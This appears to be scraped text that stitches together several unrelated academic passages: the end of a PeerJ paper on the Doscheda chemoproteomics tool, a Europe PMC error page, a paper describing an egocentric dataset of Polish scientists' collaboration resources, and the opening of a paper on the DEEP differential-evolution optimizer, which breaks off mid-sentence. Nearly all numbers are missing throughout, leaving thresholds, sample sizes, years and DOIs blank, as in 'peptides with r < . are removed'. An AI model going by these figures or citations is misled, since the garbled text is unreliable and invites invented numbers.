this case, the user can run the sigmoidal pipeline where the four-parameter log- logistic (ritz et al., ) model is applied (table ). here, the p values of the model parameters (min, max, slope, rb ) will be computed to rank proteins based on their selectivity profile (smyth & collins, ). the half maximal residual binding (rb ) is a measure of the effectiveness of a drug in binding to a protein. thus, this quantitative measure indicates how much of a drug or small molecule is needed to saturate binding to a protein by half, and can be used to compare drug-protein profiles. the rb values are typically expressed as molar concentration and are computed in the sigmoidal pipeline for each protein within doscheda. furthermore, the corrected rb , according to daub ( ) corresponds to the ratio (r) of the proteins enriched in the second incubation (supernatant) versus those retained in the first incubation (dmso or blank) with the affinity matrix. this pulldown of pulldown or depletion factor (r) enables the calculation of a kd for each protein and it will be part of doscheda’s outputs. peptide removal process using pearson correlation when peptide intensities and two replicates are available, doscheda implements a prior step to the peptide aggregation process to consider of potential technical experimental errors. the peptide removal function is tailored having in mind the typical chemoproteomics experimental design and aims to leverage the empirical peptides information of experimental replicates avoiding data imputation or using spectra features of peptides (fischer & renard, ) as they might not be necessarily available information to the final user. the peptide removal algorithm is described in fig. , in this procedure peptides that are inconsistent (e.g., anti-correlate) between replicates are excluded. this implementation is not intended to address the ratio compression (savitski et al., ) but to leverage the information available on the same peptide between the two replicates. in fact, the peptide removal process is based on the calculation of the pearson correlation coefficient between the same peptide abundances of two replicates as a pre-filtering step before summing the remaining peptide intensities to finally infer back the protein abundance. initially, the peptides are filtered by their peptide quality score (qs < . ) column, a mandatory input column in this case. next, data are filtered to have a minimum of peptides (shared or unique) per protein and per replicate such that the pearson correlation coefficient (r ) can be calculated between matched peptides. peptides with r < . are removed and summed intensities are computed from the remaining peptides; although this cut-off can be modified by the user within doscheda, we observed that . is a reasonable default threshold that removes extreme peptide quantifications (e.g., low correlated and contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure schematic of the peptide removal process algorithm. table summary scenarios in peptide removal process. prot. name peptides rep peptides rep pearson correlation coefficient action protein a, b a, b ra> . rb> . no removal, computed the summed intensities as in pd . protein a, b a null lack of peptide measurements; protein will be removed protein a, b, c a, b, c ra> . rb> . rc < . a, b considered and summed. c is removed, reason of noise in the data notes. a,b,c in the real case scenario are peptide sequences. anti-correlated peptides) and keeps almost unchanged the proteome coverage, as shown in fig. r < . . intuitively, larger r values will reflect into a larger peptide removal and consequently proteins loss as shown by figs. a– d. the r can be adjusted by the user within doscheda allowing quick results comparison in a similar fashion of fig. and, empowering the analyst to fine tuning this threshold based on project aims. finally, only proteins with more than one unique peptide are retained for the downstream analysis. table summarizes all the possible scenarios handled by the peptide removal function. contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure effect of different pearson coefficient cut offs. x- and y -axis are log fold changes. the total number of proteins , (a, %) reduces to , with pearson coefficient r = . (b,∼ %), , with r = . (c,∼ %), and with r = . (d, %). the user should initially run the exploratory data analysis in doscheda up to the principal component analysis (pca) and the correlogram plot to evaluate the correlation between replicates. only at this point the user can make an informed decision whether to apply the peptide removal function or continue to analyze the data without applying the removal process. yet, being an open source tool the peptide removal process could be replaced by any other similar function that might be available in literature (see the doscheda bioconductor vignette). additional features. the server version of doscheda comprises additional uploads that are useful when researchers are comparing datasets, including: (i) intersections of the enriched proteins with a user uploaded geneid list (e.g., protein kinesis); (ii) default mapping from uniprot accession to geneids using intermine or in case the organism of interest is not present in the drop-down list, doscheda allows the user to specify the mapping file. furthermore, doscheda allows: (i) two normalization/scaling options (see doscheda manual); (ii) interactive d plots with user-defined x- and y- axes; (iii) quality control (qc) traffic lights flags; (iv) downloadable results and detailed report of the analyses. contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure doscheda workflow. results doscheda generates a variety of different plots depending on the user’s data input, as outlined in fig. . overall there are two sets of output plots, one designed for the quality control (qc), the other one to visualize the results of the analyzed data. the doscheda application provides standard qc plots such as box, whisker plots, data distributions within each itraq/tmt channel, correlogram plots to quantify the correlation between replicates, a d-plot to verify the variance independence from the data mean, and a plot of the first two principal components. based on the qc outcomes, if data are consistent the user can proceed to the inspection of the statistical analysis results, otherwise, if peptide intensities are available the peptide removal process can be applied. for the analysis, depending on the chosen statistical model, doscheda will generate different outputs. in case of a linear model the p values distributions for the three coefficients (a , a and a ) and their corresponding interactive volcano plots are displayed. in case of a sigmoidal model doscheda will output three plots: the first showing the sigmoidal curves with a difference higher than % between the top and the bottom value; the second and the third showing the proteins that have a significant rb (p value < . ) and a significant slope (p value < . ), respectively. independently of the applied statistical model, the r package d heatmap is used to generate an interactive heatmap of the input data. contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure doscheda traffic lights flags system. two types of qcs’ are available, type based on pair- wise samples correlation obtained from the correlogram plot (a–c) and, type based on model’s p val- ues coefficients (d–e) obtained by running the linear or sigmoidal statistical analysis. in both types, green flags will be displayed when there is no anti-correlation between any samples and the number of pro- teins with p value(s) < . is larger than zero. on the contrary orange flags will be displayed when anti- correlation is observed (b) in at least one of the pairwise samples (i.e., pearson correlation coefficient, r < ) and/or there are no proteins that passes the threshold of p value(s) < . (f). once the analysis has been completed, the summary section of the application allows the user to visualize the results in a table format, where functions like ‘‘search’’ and ‘‘sorting’’ are also enabled for quick queries. the summary section contains quality control (qc) traffic light flags with green for data consistency and orange for data incongruences with an accompanying warning message. there are two types of traffic lights flags; see fig. . finally, in the download section of the application the user can download (i) a .csv file containing the results of the analysis which also includes the user-input dataset and (ii) an html report with all the plots produced in the current run, the key tables as well as the session information to facilitate data reproducibility. conclusion doscheda enables researchers with limited programming experience to perform, evaluate, and interactively visualize chemoproteomics data analysis. doscheda includes linear and non-linear statistical analysis whose results can be exported in excel spreadsheet format. also, the user will be able to generate a full report of the executed data analysis, facilitating data reproducibility. being open source, doscheda can be easily extended and modified to fit specific additional analyses. availability and requirements doscheda server lives at https://doscheda.shinyapps.io/doscheda/ and it will be constantly maintained by the authors; the users by following the link above can upload and analyze their own datasets without additional requirements. finally, to facilitate traceability and reproducibility doscheda is also available as an open source bioconductor package. contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doscheda.shinyapps.io/doscheda/ http://dx.doi.org/ . /peerj-cs. abbreviations doscheda down stream chemoproteomics data analysis qc quality controls itraq isobaric tag for relative and absolute quantitation tmt tandem mass tag ms mass spectrometry gui graphical user interface acknowledgements we thank dr. ian barrett from the discovery sciences quantitative biology group for the critical review of the manuscript. additional information and declarations funding this work was supported by astrazeneca r&d, quantitative biology, cambridge, united kingdom. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: astrazeneca r&d, quantitative biology, cambridge, united kingdom. competing interests bruno contrino, eric miele, ronald tomlinson, m. paola castaldi, and piero ricchiuto are employees of discovery science, astrazeneca. author contributions • bruno contrino analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work. • eric miele performed the experiments, contributed reagents/materials/analysis tools. • ronald tomlinson contributed reagents/materials/analysis tools, reviewed drafts of the paper. • m. paola castaldi contributed reagents/materials/analysis tools, reviewed drafts of the paper. • piero ricchiuto conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the code, manual, walkthrough descriptions and dummy data are available here: https://github.com/brunocontrino/doscheda_app. bioconductor repository and package status: https://github.com/bioconductor/contributions/issues/ . contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/brunocontrino/doscheda_app https://github.com/bioconductor/contributions/issues/ http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references bantscheff m, boesche m, eberhard d, matthieson t, sweetman g, kuster b. . robust and sensitive itraq quantification on an ltq orbitrap mass spectrometer. mol cell proteomics ( ): – doi . /mcp.m -mcp . bantscheff m, drewes g. . chemoproteomic approaches to drug target identi- fication and drug profiling. bioorganic & medicinal chemistry ( ): – doi . /j.bmc. . . . bantscheff m, eberhard d, abraham y, bastuck s, boesche m, hobson s, mathieson t, perrin j, raida m, rau c, reader v, sweetman g, bauer a, bouwmeester t, hopf c, kruse u, neubauer g, ramdsen n, rick j, kuster b, drewes g. . quantitative chemical proteomics reveals mechanisms of action of clinical abl kinase inhibitors. nature biotech : – doi . /nbt . chang w, cheng j, allaire j, xie y, mcpherson j. . shiny: web application framework for r. r package version . . available at http://cran.r-project.org/ package=shiny. choi m, chang cy, clough t, broudy d, killeen t, maclean b, vitek o. . msstats: an r package for statistical analysis of quantitative mass spectrometry-based proteomic experiments. bioinformatics ( ): – . cox j, mann m. . maxquant enables high peptide identification rates, individualized p.p.b.-range mass accuracies and proteome-wide protein quantification. nature biotechnology : – doi . /nbt. . daub h. . quantitative proteomics of kinase inhibitor targets and mechanisms. chamical biology (acs) : – doi . /cb . fischer m, renard by. . ipqf: a new peptide-to-protein summarization method us- ing peptide spectra characteristics to improve protein quantification. bioinformatics ( ): – doi . /bioinformatics/btv . jones lh, neubert h. . clinical chemoproteomics—opportunities and obstacles. science translational medicine ( ):eaaf doi . /scitranslmed.aaf . kou q, xun l, liu x. . toppic: a software tool for top-down mass spectrometry- based proteoform identification and characterization. bioinformatics ( ( )) – . maclean b, tomazela dm, shulman n, chambers m, finney gl, frewen b, kern r, tabb dl, liebler dc, maccoss mj. . skyline: an open source document editor for creating and analyzing targeted proteomics experiments. bioinformatics ( ): – doi . /bioinformatics/btq . manning. . the protein kinase complement of the human genome. science : – doi . /science. . contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /mcp.m -mcp http://dx.doi.org/ . /j.bmc. . . http://dx.doi.org/ . /nbt http://cran.r-project.org/package=shiny http://cran.r-project.org/package=shiny http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /cb http://dx.doi.org/ . /bioinformatics/btv http://dx.doi.org/ . /scitranslmed.aaf http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. martinez md, nordlund p. . the cellular thermal shift assay: a novel biophysical assay for in situ drug target engagement and mechanistic biomarker studies. annual review of pharmacology and toxicology : – doi . /annurev-pharmtox- - . mellacheruvu d, wright z, couzens al, lambert jp, st-denis na, li t, miteva yv, hauri s, sardiu me, low ty, halim va, bagshaw rd, hubner nc, al-hakim a, bouchard a, faubert d, fermin d, dunham wh, goudreault m, lin zy, badillo bg, pawson t, durocher d, coulombe b, aebersold r, superti-furga g, colinge j, heck aj, choi h, gstaiger m, mohammed s, cristea im, bennett kl, washburn mp, raught b, ewing rm, gingras ac, nesvizhskii ai. . the crapome: a contaminant repository for affinity purification mass spectrometry data. nature methods : – doi . /nmeth. . r core team. . r: a language and environment for statistical computing. vienna: r foundation for statistical computing. available at http://www.r-project.org. ritz c, baty f, streibig jc, gerhard d. . dose-response analysis using r. plos one ( ):e doi . /journal.pone. . savitski mm, mathieson t, zinn n, sweetman g, doce c, becher i, pachl f, kuster b, bantscheff m. . measuring and managing ratio compression for accurate itraq/tmt quantification. journal of proteome research ( ): – doi . /pr r. schirle m, bantscheff m, kuster b. . mass spectrometry-based proteomics in preclinical drug discovery. chemistry and biology ( ): – doi . /j.chembiol. . . . smyth gk. . linear models and empirical bayes methods for assessing differential expression in microarray experiments. statistical applications in genetics and molecular biology : article . smyth la, collins i. . measuring and interpreting the selectivity of protein kinase inhibitors. journal of chemical biology ( ): – doi . /s - - - . tyanova s, temu t, sinitcyn p, carlson a, hein my, geiger t, mann m, cox j. . the perseus computational platform for comprehensive analysis of (prote)omics data. nature methods : – doi . /nmeth. . wang p, yang p, yang jy. . ocap: an open comprehensive analysis pipeline for itraq. bioinformatics ( ): – doi . /bioinformatics/bts . wieczorek s, combes f, lazar c, gianetto qg, gatto l, dorffer a, hesse am, couté y, ferro m, bruley c, burger t. . dapar & prostar: software to perform sta- tistical analyses in quantitative discovery proteomics. bioinformatics ( ): – doi . /bioinformatics/btw . contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /annurev-pharmtox- - http://dx.doi.org/ . /nmeth. http://www.r-project.org http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /pr r http://dx.doi.org/ . /j.chembiol. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /bioinformatics/bts http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /peerj-cs. wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). issue | vol. article | doi: . /connections- . connections academic collaboration via resource contributions: an egocentric dataset michał bojanowski, ,* dominika czerniawska and wojciech fenrich kozminski university, warsaw, poland. university of manchester, manchester, uk and university of warsaw, warsaw, poland. university of warsaw, warsaw, poland. *e-mail: michal @gmail.com abstract in order to understand scientists’ incentives to form collaborative relations, we have conducted a study looking into academically relevant resources, which scientists contribute into collaborations with others. the data we describe in this paper are an egocentric dataset assembled by coding originally qualitative material. it is multiplex ego networks containing data on individual attributes (such as gender, scientific degree), collaboration ties (including alter–alter ties), and resource flows. resources are coded using a developed inventory of types of academically relevant resources egos and alters contribute into their collaborations. we share the data with the research community with the hopes of enriching knowledge and tools for studying sociological and behavioral aspects of science as a social process. keywords collaboration networks, resources, sociology of science, ego networks. scientometric studies report steadily increasing trend in multi-authored scientific publications. it is clearly an evidence that contemporary science requires cooperation and is not anymore a traditionally individualistic activity (moody, ). the presented data set comes from a study in which our overarching research goal was to understand why some scientists collaborate, but some others do not. in particular, our approach was to think about incentives that might lead them to do so. inspired by coleman ( ) and, among others, laudel ( ), lewis et al. ( ) as well as our earlier results (czerniawska et al., ), we assume that the incentives to collaborate come from academically relevant resources the scientists possess or control and the interests they might have in resources possessed or controlled by others. for example, a theorist and an experimentalist might be interested in each other’s resources – ability to develop theoretical model of the studied problem and skills in conducting experiments, respectively. unequal distribution of these resources across academic community and the necessity of pooling them to get ahead in contemporary science results in incentives to collaborate. current state of knowledge still lacks a universally accepted behavioral understanding of the scientific process, let alone standardized tools for measuring academically relevant resources. hence, we conducted a qualitative study among polish scientists with the goal to: . collect egocentric data on collaborative relations; . develop an inventory of academically relevant resources from respondents’ reports; and . measure what resources (item ) collaborating parties (ego and alters) engage in their collab- oration ties (item ). the data we hereby share are based on transcriptions and coding of the originally qualitative material. the second section provides some brief background information on science in poland and details our contribution. the presented study involved interviews conducted on a sample of polish scientists, academic collaboration via resource contributions: an egocentric dataset which we describe further in the third section. in the fourth section, we describe the way in which the inventory of resources was constructed. a complete list with example quotes is provided on the associated website. the fifth section describes the structure of the data set. the sixth section provides illustrative examples. the seventh section provides the details where the data can be found and how it can be accessed. finally, in the eight section, we discuss limitations and potential uses of the data. background and contribution the presented data come from a study, which was conducted in poland among polish researchers. polish scientific community is among the largest in europe: according to oecd ( ) statistics, there were , researchers in poland in . at the same time, the funding and material resources are only average (cf. czerniawska, ; kwiek and szadkowski, ). these conditions, next to some others, keep polish science largely outside of the strict core of international scientific collaboration (leydesdorff et al., ). the organization and institutions of polish scientific system resemble “continental” systems (e.g. german scientific system). a typical scientific career requires a four year phd program, a habilitation which is expected within eight years after a phd. obtaining a habilitation is perceived as the final step to becoming an independent scholar. polish scientific community, similarly to many other scientific communities in europe, is rather diverse. it is a mix of modern, competitive, internationalized disciplines and groups, and more conservative locally oriented areas (kwiek, ). explaining the presence or absence of collabo- ration relations among scientists by referring to complementarities between them is not a new idea. for example, qin et al. ( ) in their bibliometric analysis use institutional affiliation to capture different specialization of scientists. moody ( ) approximates different types of contributions by analyzing subject codes put on articles indexed by sociological abstracts. our goal was to collect a list of resources they believe are relevant when working as a scientist. we believe a genuine contribution of the presented data set lies in that detailed information on the flow of resources in scientific collaborations. the catalogue, which is a unique contribution in scientific collaboration studies, was constructed based on the extensive literature review and themes mentioned by our interviewees. the data have been used to study whether structurally non-redundant ties are more likely to be characterized with resource contributions not found in other ties (bojanowski and czerniawska, ). sample data come from individual in-depth interviews (idi) conducted between april and august by two interviewers. the quota sample consists of female and male scientists from six polish cities. respondents represented a broad range of disciplines: natural sciences, social sciences, life sciences, the humanities, engineering, and technology on different levels of career from phd candidates to professors. the interviewees mentioned collaborators in total. interviews lasting between and min were recorded and later transcribed. measurement each interview consisted of several parts, three of which are of relevance here: . respondents were asked to name up to important researchers they have collaborated with during last five years. each collaborator was discussed separately giving information about gender, scientific degree, nationality, and university department (if possible). see section . below. . during the interview a network of collaboration among collaborators mentioned in item ( ) was reconstructed using cork board, pins, and rub- ber bands. see the example in figure . cork boards were photographed and later digitized into edgelist data. see section . below. . for each collaborator, the respondents were asked about academically relevant resources he/she contributed to the collaboration and what resources were contributed by the col- laborator. interviewees were provided with a broad framework, which would help them iden- tify resources such as financial resources (e.g. funding), human resources (e.g. knowledge, skills), and social resources (e.g. collaborators). . interviews were audio-recorded and later transcribed. the text of the transcripts was analyzed using qda miner lite in order to code a product of provalis research, see https://provalisresearch. com/products/qualitative-data-analysis-software/. at https://recon-icm.github.io/reconqdata/articles/resource_ inventory.html. connections resources engaged by respondents (the egos) and their collaborators (the alters) to every col- laboration. the coding was performed by two persons. random sample of the interviews was double-checked by different researchers to ensure reliability. the data are available in table resources and described in detail below. while collaboration networks assembled from part ( ) include alter–alter ties, the data on resources from part ( ) were acquired for ego-alter dyads only. structure of the data the data are contained in three inter-related tables diagrammatically presented in figure . below we describe each table in detail. node attributes the table nodes contain information about every person in the study – all egos and all alters. it has rows and the following seven variables: • id _ interview – interview identification number. • id _ node – person identification number, unique within each interview. • is _ ego – binary variable equal to if person is the ego (respondent), otherwise. • is _ polish – binary variable equal to if person is affiliated with a polish academic in- stitution, otherwise. • department – marking scientists if they work at the same department. if department is not missing then all scientist within the same inter- view sharing the same value of department work at the same department at the same university. • scidegree – scientific degree of the scientist. one of “mgr” = ma, “dr” = phd, “drhab” = habili- tated doctor, or “prof” = full professor. • female – binary variable equal to if person is female, if male. pair of variables id _ interview and id _ node together constitutes a key uniquely identifying each row in the nodes table. collaboration networks the table collaboration is essentially an edge list of collaboration ties. it has , rows and the following three variables: • id _ interview – interview identification number. figure : using cork board, pins, and rubber bands to collect data on collaborations. small cards contained names or nicknames which have been masked. figure : the data consist of three interrelated tables. table ‘nodes’ contains information about all persons. table ‘collaboration’ is an edgelist of collaboration ties. table ‘resources’ is a multiplex edgelist of resource flows. academic collaboration via resource contributions: an egocentric dataset • from and two – person identification numbers referencing the id _ node variable from the nodes table. in other words, a row consisting of values, say, id _ interview = , from = , to = indicates that researchers and where reported as collaborating in the interview . resource contributions data about resources engaged by respondents (egos) and their collaborators (alters) to every collaboration were coded based on transcripts. the data are provided in table resources having , rows and the following four columns: • id _ interview – interview identification number. • from and two – person identification numbers (within each interview) referencing the id _ node variable from the nodes table. • code – a textual code identifying type of re- source contributed by researcher from into the collaboration with researcher to. resources engaged in collaborations (variable code) were coded with a coding scheme covering different elements of a research process in different disciplines. the scheme consists of codes such as: • ‘conceptualisation’ – coming up with an idea for a study, providing general theoretical framework; designing a general framework for a study. • ‘methodology’ – designing methodology for a study. • ‘investigation’ – conducting research, gather- ing data. • ‘data analysis’ – data analysis, quantitative as well as qualitative. • ‘data curation’ – managing and archiving data. • ‘software creation’ – writing software for re- search process. • ‘prototype construction’ – building a proto- type that is used in research process. complete list of codes together with examples of coded interview fragments is available at the website. table . frequencies of gender and scientific degree for egos and alters. symbol ‘–’(dash) corresponds to missing data. gender degree alter ego female full professor female habilitated phd female ma female phd male full professor male habilitated phd male ma male phd – ma – – phd – – – – selected descriptives as a glimpse into the data, table shows frequency distribution of gender and scientific degree for egos and alters separately. figure shows resource flow networks from one of the interviews: accessing the data the data are available in a github repository at https://recon-icm.github.io/reconqdata as an r package with accessible files in a csv format. users can use the data with r by installing the package or download the data files in csv format using urls provided in the readme file. discussion we close by discussing potential uses and limitations of the documented data set. we think that the data we share can be used in several contexts with substantive and methodological goals in mind. on the substantive side, the data can be used to address several research questions. for example to analyze co-appearance of different types of resources in collaboration ties – certain https://recon-icm.github.io/reconqdata/articles/resource_ inventory.html. connections figure : collaboration (dashed, undirected) and resource flow (solid, directed) ties from one of the interviews. types of resources tend to be contributed together. further, the resource catalog could be improved and perhaps serve as a starting point for constructing a more standardized survey instrument. on the methodological side, the value of the data set is that it is egocentric and multiplex at the same time. we see active development in statistical models for data collected through egocentric design (krivitsky and morris, ) as well as in modeling multilayer networks (krivitsky et al., ). the data we share can be a useful test bed for such models. the data have certain limitations. first, it comes from a qualitative study conducted on a quota sample. the obvious limitation is the lack of representativeness in the strict statistical sense. nevertheless, it is representative in the loose sense – the respondents come from universities from different regions and of different size, from different disciplines and at different stages of scientific career. we believe it does cover the diversity of scientific positions pretty well. second, the data contain several instances of resource flows between the alters. however, the reliability of this data is rather low. majority of respondents did not have enough information or were otherwise not confident enough in reporting the resource contributions. consequently, these data were not collected systematically. acknowledgments the authors thank (polish) national science cen- tre for support through sonata grant / /d/ hs / for the project dynamics of competition and collaboration in science: individual strategies, collaboration networks, and organizational hierar- chies (http://recon.icm.edu.pl). references bojanowski, m. and czerniawska, d. . reaching for unique resources: structural holes and specialization in scientific collaboration networks. journal of social structure. forthcoming. preprint available on-line, available at: http://recon.icm.edu.pl/ wp-content/uploads/ / /exchange_networks.pdf. academic collaboration via resource contributions: an egocentric dataset coleman, j. s. . foundations of social theory, harvard university press, cambridge, ma. czerniawska, d. . sieci współpracy i wymiany w centrach i na peryferiach. przypadek polskiej nauki (phd thesis). university of warsaw, warsaw, poland. czerniawska, d., fenrich, w. and bojanowski, m. . actors, relations, and networks: scholarly collaboration beyond bibliometric measures. polish sociological review, : – . krivitsky, p. n. and morris, m. . inference for social network models from egocentrically sampled data, with application to understanding persistent racial disparities in hiv prevalence in the us. the annals of applied statistics, ( ): – . krivitsky, p. n., koehly, l. m. and marcum, c. s. . exponential-family random graph models for multi-layer networks. socarxiv, available at: https://doi.org/ . / osf.io/dqe b (accessed august , ). kwiek, m. . changing european academics: a comparative study of social stratification, work patterns and research productivity. routledge, london. kwiek, m. and szadkowski, k. . higher education systems and institutions, poland. in teixeira, p., shin, j. c., amaral, a., bernasconi, a., magalhaes, a., kehm, b. m. and nokkala, t. (eds), encyclopedia of international higher education systems and institutions, springer, pp. – , available at: https://doi.org/ . / - - - - _ - . laudel, g. . collaboration, creativity and rewards: why and how scientists collaborate. international journal of technology management, ( – ): – . lewis, j. m., ross, s. and holden, t. . the how and why of academic collaboration: disciplinary differences and policy implications. higher education, ( ): – . leydesdorff, l., wagner, c., park, h. w. and adams, j. . international collaboration in science: the global map and the network, available at: http:// arxiv.org/abs/ . (accessed august , ). moody, j. . the structure of a social science collaboration network: disciplinary cohesion from to . american sociological review, ( ): – . oecd. . oecd science, technology and r&d statistics: main science and technology indicators, available at: https://data.oecd.org (accessed august , ). qin, j., lancaster, f. w. and allen, b. . types and levels of collaboration in interdisciplinary research in the sciences. journal of the american society for information science, ( ): – . submitted november accepted june published august corresponding author konstantin kozlov, kozlov_kn@spbstu.ru, mackoel@gmail.com academic editor sandra gesing additional information and declarations can be found on page doi . /peerj-cs. copyright kozlov et al. distributed under creative commons cc-by . open access a software for parameter optimization with differential evolution entirely parallel method konstantin kozlov , alexander m. samsonov , and maria samsonova mathematical biology and bioinformatics lab, iamm, peter the great st. petersburg polytechnic university, st. petersburg, russia ioffe institute, saint petersburg, russia abstract summary. differential evolution entirely parallel (deep) package is a software for finding unknown real and integer parameters in dynamical models of biological processes by minimizing one or even several objective functions that measure the deviation of model solution from data. numerical solutions provided by the most efficient global optimization methods are often problem-specific and cannot be easily adapted to other tasks. in contrast, deep allows a user to describe both mathematical model and objective function in any programming language, such as r, octave or python and others. being implemented in c, deep demonstrates as good performance as the top three methods from cec- (competition on evolutionary computation) benchmark and was successfully applied to several biological problems. availability. deep method is an open source and free software distributed under the terms of gpl licence version . the sources are available at http://deepmethod. sourceforge.net/ and binary packages for fedora gnu/linux are provided for rpm package manager at https://build.opensuse.org/project/repositories/home:mackoel: compbio. subjects computational biology, distributed and parallel computing, optimization theory and computation keywords differential evolution, parameter optimization, mathematical modeling, parallelization, bioinformatics, open source software introduction the estimation of dynamical model parameters minimizing the discrepancy between model solution and the set of observed data is among the most important, widely studied problems in applied mathematics, and is known as an inverse problem of mathematical modeling (mendes & kell, ; moles, mendes & banga, ). numerical strategies for solutions of an inverse problems often involve optimization methods. many global and local, stochastic and deterministic optimization techniques, including the nature-inspired ones, have been developed and implemented in a wide range of free, open source and commercial software packages. mathematical modeling being one of the primary tools of computational systems biology provides new insights into the mechanisms that control the biological systems. it becomes very attractive to experimentalists due to predictive abilities of carefully selected models, if any. how to cite this article kozlov et al. ( ), a software for parameter optimization with differential evolution entirely parallel method. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:kozlov_kn@spbstu.ru mailto:mackoel@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://deepmethod.sourceforge.net/ http://deepmethod.sourceforge.net/ https://build.opensuse.org/project/repositories/home:mackoel:compbio https://build.opensuse.org/project/repositories/home:mackoel:compbio http://dx.doi.org/ . /peerj-cs. researchers benefit from the ability of a model to predict in silico the consequences of a biological experiment, which was not used for training. the properties of the model are determined by the structure of the mathematical description and the values of the unknown constants and control parameters that represents the coefficients of underlying biochemical reactions. these unknowns are to be found as a best suited solution to an inverse problem of mathematical modeling, i.e., by the fitting model output to experimental observations. the parameter set is to be reliable, and different types of data are to be considered. development of reliable and easy-to-use algorithmsand programs for solution to the inverse problem remains a challenging task due to diversity and high computational complexity of biomedical applications, as well as the necessity to treat large sets of heterogeneous data. in systems biology the commonly used global optimization algorithm is the parallel simulated annealing (sa) (chu, deng & reinitz, ). this method requires considerable cpu time, but is capable to eventually find the global extremum and runs efficiently in parallel computations. however, the wide range of methods called genetic algorithms (ga) has been developed later and successfully applied to biological problems (spirov & kazansky, ). modern evolutionary algorithms such as evolution strategies (ess) or differential evolution (de) can outperform other methods in the estimation of parameters of several biological models (fomekong-nanfack, kaandorp & blom, ; fomekong- nanfack, ; suleimenov, ). the general challenge in the efficient implementation of the global optimization methods is that they depend on problem-specific assumptions and thus are not able to be easily adapted to another problems. for example, in sa both the final result and computational time depend on the so-called cooling schedule, the success of the ga optimization strongly depends on selected mutation, recombination and selection rules, and the evolutionary algorithms heavily rely on the algorithmic parameters which define the model of evolution. currently a lot of approaches exist based on metaheuristics for parameters estimation in biology. for example, enhanced scatter search (egea, martí & banga, ), implemented in meigor (metaheuristics for systems biology and bioinformatics global optimization) package for r statistical language was reported to outperform the state-of-the-art methods (egea et al., ). this method can provide high quality solution for integer and real parameters, however, it is computationally expensive. we developed deep, a software that implements the differential evolution entirely parallel (deep) method introduced recently (kozlov & samsonov, ). the rationale behind the design of this programme was to provide an open source software with performance comparable to the competitive packages, as well as to allow a user to implement both mathematical model and comparison of solution with experimental data in any software package or programming language, such as r, octave, python or others. problem statement deep method was developed to solve the inverse problem of mathematical modeling. for a given mathematical model with parameters q∈rk , where k is number of parameters, and observable data y we seek the vector q̂: q̂=argminf(q,y ) ( ) kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where f is a measure of the deviation of model prediction from observable data. additional constraints may be imposed: hj(q)= , j= ,...,nh ( ) gm(q)≤ , m= ,...,ng ( ) qlk <qk <q u k , k∈ i ⊂{ ,...,k} ( ) where nh and ng are numbers of constraints in a form of equality and inequality respectively, and i ⊂{ ,...,k} denotes the set of indices for parameters with box constraints. several objective functions can be combined: f(q,y )= nf � i= fi(q,y ) ( ) where � denotes one of the aggregation methods—summation or maximization. differential evolution entirely parallel method the main algorithm differential evolution (de) was proposed in storn & price ( ) as an effective stochastic method for function minimization. de deals with a set (population) of randomly generated parameter vectors (individuals). the population on each iteration is referred to as generation, moreover, a size of population np is fixed. deep method (kozlov & samsonov, ) incorporates two enhancements found in literature, as well as some elaborated modifications. these enhancements consist in the ‘‘trigonometric mutation’’ rule proposed in fan & lampinen ( ) and used to take into account a value of the objective function for each individual at the recombination step, and the adaptive scheme for selection of internal parameters based on the control of the population diversity developed in zaharie ( ). the motivation to select these enhancements was to make algorithm more suitable for biological problems containing big data sets and not properly defined objective function. the key concept behind the deep method is the age of individual defined as a number of generations, during which the individual survived without any change of its parameter vector. the failure to update the parameter values indicates a convergence to a local minimum. to avoid it we propose to substitute the number of oldest individuals with the same number of the best ones after the predefined number of iterations . to enhance the method further we incorporated an optional scatter search step (egea, martí & 